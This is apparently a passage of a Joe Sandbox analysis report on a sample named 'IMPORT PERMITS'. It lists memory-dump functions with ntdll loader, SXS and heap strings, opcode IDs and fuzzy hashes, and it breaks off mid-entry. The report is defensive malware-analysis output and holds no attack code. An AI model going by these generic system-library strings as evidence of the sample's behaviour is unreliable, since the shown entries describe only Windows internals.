                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c$x,
                                                                                                                                • API String ID: 0-3598869563
                                                                                                                                • Opcode ID: e0cee76ec73d74398c63cccc9d53890efe5a84335255c945bc384c5a45dbbcd4
                                                                                                                                • Instruction ID: 64862e2558e9dd10e35b05ee5d36dc37337eb2fff7d0eb7fbb284acccd262a1f
                                                                                                                                • Opcode Fuzzy Hash: e0cee76ec73d74398c63cccc9d53890efe5a84335255c945bc384c5a45dbbcd4
                                                                                                                                • Instruction Fuzzy Hash: E1915770B413219BDB35DF19D845BAB7BB1AB10B58F05402FE9006F7B6E7B09882C795
                                                                                                                                Function 013D645D Relevance: 8.9, Strings: 7, Instructions: 150COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c$x,
                                                                                                                                • API String ID: 0-1135667044
                                                                                                                                • Opcode ID: c0db3d60af01e9026374ee280320d9c0b8b5fec6d201bad05287fb62116de70c
                                                                                                                                • Instruction ID: cee57c25e1d132e16a6df3de4bcea69081bf3bc2372d1b7e006bf43265cc8cf2
                                                                                                                                • Opcode Fuzzy Hash: c0db3d60af01e9026374ee280320d9c0b8b5fec6d201bad05287fb62116de70c
                                                                                                                                • Instruction Fuzzy Hash: E65106B12083059FE724EF29D842B5B77E8FB88B48F00491EF59597270DB70E945CB92
                                                                                                                                Function 013EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                • Opcode ID: 022b93922ff1923440ffc426dd9234e20cf673b45d46c9758c1fe85c41df126e
                                                                                                                                • Instruction ID: 57836b10ade8f7818a911babbaa9c5e7d1b8abf1fba0723f17e7b2059541d7f5
                                                                                                                                • Opcode Fuzzy Hash: 022b93922ff1923440ffc426dd9234e20cf673b45d46c9758c1fe85c41df126e
                                                                                                                                • Instruction Fuzzy Hash: AFA24D74A056298FEF64DF18CC987A9BBB5AF45304F1442EAD50DA73A0DB749E85CF00
                                                                                                                                Function 01412674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0145219F
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01452178
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01452165
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01452180
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014521BF
                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01452160, 0145219A, 014521BA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                • API String ID: 0-861424205
                                                                                                                                • Opcode ID: b7bf5ee292f1b2fc44b6f33e3d500648b0e42252daf7c175d81722b77e7abfa9
                                                                                                                                • Instruction ID: 367ca2381762906f09f705b461a298586d103ea5b2261915af5a22112a3a0d96
                                                                                                                                • Opcode Fuzzy Hash: b7bf5ee292f1b2fc44b6f33e3d500648b0e42252daf7c175d81722b77e7abfa9
                                                                                                                                • Instruction Fuzzy Hash: 8631063AB40215B7E7218A9B9C41F5B7B68DB64A54F15005FFF04AB365D2B09E01CBA1
                                                                                                                                Function 0141C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01458170
                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01458177, 014581EB
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01458181, 014581F5
                                                                                                                                • LdrpInitializeProcess, xrefs: 0141C6C4
                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 014581E5
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0141C6C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-475462383
                                                                                                                                • Opcode ID: 08a47a776e919a84e9ed39ecdaf4b7f6bca1f4eb22574512b84598acc1028b5e
                                                                                                                                • Instruction ID: 3f320f7795ecb03903fd21dd6ea592019c42e9dc0438123b9312dfca1fa32843
                                                                                                                                • Opcode Fuzzy Hash: 08a47a776e919a84e9ed39ecdaf4b7f6bca1f4eb22574512b84598acc1028b5e
                                                                                                                                • Instruction Fuzzy Hash: 6331E6B16443069BC324EF2ADC85E2B77A5EFA4B14F05451DF9846B3B1EA30ED04C7A2
                                                                                                                                Function 0142096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 01422DF0: LdrInitializeThunk.NTDLL ref: 01422DFA
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BA3
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BB6
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D60
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D74
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                • Opcode ID: 90b6e56ba8b8973421a90932f49b6a6a8adcc357a2fd9c590d3eec2ae66e81d1
                                                                                                                                • Instruction ID: 2a67ff6a35fe7d9cd6c1b3e88b3124f5df8dc036c1760ea370a2f0f3ea0e7b1f
                                                                                                                                • Opcode Fuzzy Hash: 90b6e56ba8b8973421a90932f49b6a6a8adcc357a2fd9c590d3eec2ae66e81d1
                                                                                                                                • Instruction Fuzzy Hash: 96426A71900715DFDB61CF28C880BAAB7F5BF14314F4445AAE989EB352E770AA85CF60
                                                                                                                                Function 0141C720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +$ +$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-4166866722
                                                                                                                                • Opcode ID: 503f1ab00c55b1b6ec91da07d31f08331f03eb7f8e2bbad423526d8aa2dfe2b1
                                                                                                                                • Instruction ID: 56ea1c87dd74d26e03da332fe5f6ce5f8caecc74ae153249dc6dcc0bd9cdfb15
                                                                                                                                • Opcode Fuzzy Hash: 503f1ab00c55b1b6ec91da07d31f08331f03eb7f8e2bbad423526d8aa2dfe2b1
                                                                                                                                • Instruction Fuzzy Hash: B641F371681302ABDB21EB69DC84B5B77E8EB54B54F01482FF958D72B5EBB0D8008B91
                                                                                                                                Function 013EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                • API String ID: 0-379654539
                                                                                                                                • Opcode ID: cb7b0723c460d60fe8aa0fcda8fbc07c19c65abbdfc7d3beb0877dd5320d82d1
                                                                                                                                • Instruction ID: 60c8c88c279cfbef549636f148a37893c5990a5afa81a68ace76c8b40bd748ab
                                                                                                                                • Opcode Fuzzy Hash: cb7b0723c460d60fe8aa0fcda8fbc07c19c65abbdfc7d3beb0877dd5320d82d1
                                                                                                                                • Instruction Fuzzy Hash: FAC1AC75108396CFD711CF58C048B6ABBE8BF84708F04886EF9959B7A0E774C949CB56
                                                                                                                                Function 01418402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • @, xrefs: 01418591
                                                                                                                                • LdrpInitializeProcess, xrefs: 01418422
                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0141855E
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01418421
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                • Opcode ID: 1136e80d9ffa7ece02198a3d8605e28f41d0b64225403ef7d5a36a22445ba1e0
                                                                                                                                • Instruction ID: 1e3e778c139136626a2cfe84bdb622a1b2838acc01371714e430bcb507de2784
                                                                                                                                • Opcode Fuzzy Hash: 1136e80d9ffa7ece02198a3d8605e28f41d0b64225403ef7d5a36a22445ba1e0
                                                                                                                                • Instruction Fuzzy Hash: EE91AC71548346AFD721DF26CC80FABBBE8FB94644F40092FFA8896165E770D944CB62
                                                                                                                                Function 0141273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014521D9, 014522B1
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 014521DE
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014522B6
                                                                                                                                • .Local, xrefs: 014128D8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                • Opcode ID: 516a89a703954804b8e052c2aef2864570b707dc7cc752045250b4bddf85ec1f
                                                                                                                                • Instruction ID: e0e4840cd4b8eb2ae1a8e17d74cf36090f7b71063d9f428e17db3e5e54e02725
                                                                                                                                • Opcode Fuzzy Hash: 516a89a703954804b8e052c2aef2864570b707dc7cc752045250b4bddf85ec1f
                                                                                                                                • Instruction Fuzzy Hash: B7A1AF35A00229DBDB24CF58D884BAAB7B1BF58354F2401EBE908E7365D7709E81CF80
                                                                                                                                Function 01414AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01453437
                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0145342A
                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01453456
                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01453425, 01453432, 01453451
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                • Opcode ID: 9eda996fdc93ca1aaa56eb86c7d8ce7ce8ed3310758a9e287a3d180c495803ad
                                                                                                                                • Instruction ID: e22ec0d573f86df966b4a62ae7df19eea6f19389416da1c6acc4d8604b7f7b43
                                                                                                                                • Opcode Fuzzy Hash: 9eda996fdc93ca1aaa56eb86c7d8ce7ce8ed3310758a9e287a3d180c495803ad
                                                                                                                                • Instruction Fuzzy Hash: 106122326407129BD722CF1DC841B2BBBE4BF91B94F19852EE9559B366D730E801CB91
                                                                                                                                Function 013E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01440FE5
                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014410AE
                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0144106B
                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01441028
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                • Opcode ID: 6f993be0ffc2dfe97061cf1137d48f638bd1982a4e16f801dd9f4eda8a738e6b
                                                                                                                                • Instruction ID: 692621783a5342711110106de84a6e73b6b95c7838f4cb4f4064015c8c7f02af
                                                                                                                                • Opcode Fuzzy Hash: 6f993be0ffc2dfe97061cf1137d48f638bd1982a4e16f801dd9f4eda8a738e6b
                                                                                                                                • Instruction Fuzzy Hash: 3B71DFB1A043159FDB20DF19C885B9B7FE8AFA4758F40046DF9488B296D734D588CB92
                                                                                                                                Function 0140245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpDynamicShimModule, xrefs: 0144A998
                                                                                                                                • apphelp.dll, xrefs: 01402462
                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0144A992
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0144A9A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-176724104
                                                                                                                                • Opcode ID: 47b7199cf46a5821ab60a349a8a82d618da99fa25fe31d962a0524a52d50f940
                                                                                                                                • Instruction ID: 9c527e4bd3687014208d0507f41caf6f00e526a10c88b1788f5b1e889f5d653d
                                                                                                                                • Opcode Fuzzy Hash: 47b7199cf46a5821ab60a349a8a82d618da99fa25fe31d962a0524a52d50f940
                                                                                                                                • Instruction Fuzzy Hash: 3C3107B5641202ABEF319F5DD846E6A77B4FB84B04F26406FF902673B5D7B05941C780
                                                                                                                                Function 014620DE Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • x,, xrefs: 014620EB
                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 014620F3
                                                                                                                                • LdrpInitializationFailure, xrefs: 014620FA
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01462104
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c$x,
                                                                                                                                • API String ID: 0-4118614411
                                                                                                                                • Opcode ID: 9fd41679647e482accd3f98194177fafc7c5f20d3d427b1c9106f140138fbed2
                                                                                                                                • Instruction ID: 636ab37616e731a610ce24de9347a34e3fd94ddbe66f5d612666fbb7c58c2d24
                                                                                                                                • Opcode Fuzzy Hash: 9fd41679647e482accd3f98194177fafc7c5f20d3d427b1c9106f140138fbed2
                                                                                                                                • Instruction Fuzzy Hash: C5F0F475640308BBEB24EA4D8C46FD63B6CEB40F08F50001EFA0077392D2F0A9008B82
                                                                                                                                Function 013F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • HEAP: , xrefs: 013F3264
                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013F327D
                                                                                                                                • HEAP[%wZ]: , xrefs: 013F3255
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                • API String ID: 0-617086771
                                                                                                                                • Opcode ID: ea11ce3ed783a40c4119d334b118792064eb7c5ad9448b353999414a867e2a4a
                                                                                                                                • Instruction ID: 849f9312b961080b355c07799445b249202cd0ba2abf2dab43fb28e8f3bc9fc5
                                                                                                                                • Opcode Fuzzy Hash: ea11ce3ed783a40c4119d334b118792064eb7c5ad9448b353999414a867e2a4a
                                                                                                                                • Instruction Fuzzy Hash: 9492BB70A04249DFEB25CF68C444BAEBBF1FF48318F18805EEA59AB791D734A945CB50
                                                                                                                                Function 013F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                • Opcode ID: 9180a4a34adec382cf9d8bfea15da27ee8e07cf4b0ee1013b9c35c97da47054f
                                                                                                                                • Instruction ID: 76436a474922ca1e4af873f9551b71476db76088b9b9f55cc1c31f4d5317df11
                                                                                                                                • Opcode Fuzzy Hash: 9180a4a34adec382cf9d8bfea15da27ee8e07cf4b0ee1013b9c35c97da47054f
                                                                                                                                • Instruction Fuzzy Hash: D2F18D74A00606DFEB19CF6CC494B6ABBB6FB44308F14416EE6169B7A2D734E941CF90
                                                                                                                                Function 01406962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $@
                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                • Opcode ID: 7084113109dadbeaaca9372dce1fd5f2e25894656ab5a95c546cd3ab271051d8
                                                                                                                                • Instruction ID: e76539e92a2bbf9be29ac5ef14a5eafff86b6cb91a6f275f9802e62412043d11
                                                                                                                                • Opcode Fuzzy Hash: 7084113109dadbeaaca9372dce1fd5f2e25894656ab5a95c546cd3ab271051d8
                                                                                                                                • Instruction Fuzzy Hash: 04C2A5716093419FE726CF29C480B6BBBE5AF88754F05892EE9C9873A1D734E805CB52
                                                                                                                                Function 013DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                • Opcode ID: 8779db07e725004d684bf9d43b9e61124cdfeb863f41b30b36192487d50481d2
                                                                                                                                • Instruction ID: f0a86803bc84a03bb28b10f26cb9c41a818b3fcf443c26d64e8a7d545e183556
                                                                                                                                • Opcode Fuzzy Hash: 8779db07e725004d684bf9d43b9e61124cdfeb863f41b30b36192487d50481d2
                                                                                                                                • Instruction Fuzzy Hash: 0AA15E719012299BDB31DF29CC88BEAB7B8EF58714F1001EAE909A7260D7359F85CF50
                                                                                                                                Function 01400BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0144A10F
                                                                                                                                • LdrpCheckModule, xrefs: 0144A117
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0144A121
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-161242083
                                                                                                                                • Opcode ID: 51b4c06bee454d11f2334be06b2857994a92969c78647543a30f67913a0d79ad
                                                                                                                                • Instruction ID: d9cce26b324d9f315c3dcd4e4b0fd20ab15cae2032cc0a91421956f52616eb26
                                                                                                                                • Opcode Fuzzy Hash: 51b4c06bee454d11f2334be06b2857994a92969c78647543a30f67913a0d79ad
                                                                                                                                • Instruction Fuzzy Hash: 2971B170A402069FDF2ADF69C981BAEB7F4EB44644F15402EE506D7365E734A942CB50
                                                                                                                                Function 013F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-1334570610
                                                                                                                                • Opcode ID: f7b98a25cc8737075855637701c58da81ad9c20c133af6e46d8d87090439b80b
                                                                                                                                • Instruction ID: 125f316448b91b4af032637303bd1d8e39b3129f64b56e874b7b4279493ef35f
                                                                                                                                • Opcode Fuzzy Hash: f7b98a25cc8737075855637701c58da81ad9c20c133af6e46d8d87090439b80b
                                                                                                                                • Instruction Fuzzy Hash: 3661BC706003459FEB29CF28C480B6ABBE6FF45708F15856EE5498F6A6D770E881CB91
                                                                                                                                Function 0149C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • PreferredUILanguages, xrefs: 0149C212
                                                                                                                                • @, xrefs: 0149C1F1
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0149C1C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
